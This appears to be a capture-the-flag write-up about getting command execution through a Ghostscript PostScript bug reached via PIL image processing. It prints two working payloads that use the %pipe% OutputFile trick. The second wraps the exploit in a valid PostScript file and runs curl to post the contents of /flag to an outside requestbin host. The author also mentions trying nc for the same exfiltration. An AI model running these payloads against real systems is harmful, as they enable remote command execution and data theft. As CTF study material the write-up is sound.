Rating: 3.5

The challenge was related to a recent disclosure exploit
[https://www.exploit-db.com/exploits/45243/](https://www.exploit-db.com/exploits/45243/)

First, we try the exploit from the original post, but it doesn't work because PIL do check the image size first.
```
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
```
So I try to download a normal Postscript example, and combine with the exploit
```
%!PS-Adobe-1.0
%%Creator: PS_Write.F
%%CreationDate: 09/29/99
%%Title: region.ps
%%Document-Fonts: Times-Roman
%%BoundingBox: 0 0 1000 500
%%BeginProlog
%%EndProlog
/Palatino-Roman findfont
0.0000 0.0000 0.0000 setrgbcolor
%%Page: 1 1
/Times-Roman findfont
20 scalefont
setfont
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%curl --data "`cat /flag`" http://requestbin.fullcontact.com/12jsa501) currentdevice putdeviceprops
showpage
%%Trailer
%%Pages: 1
%%EOF
quit
```

I use requestbin.fullcontact.com for receiving the result. I stuck here about 10 minute by using `nc` to send to result, then realized the OS might not have `nc`.

firstenquiryseo1 – Sept. 6, 2018, 7:33 a.m.

Only well-experienced people in coding technologies will understand what you're about to convey.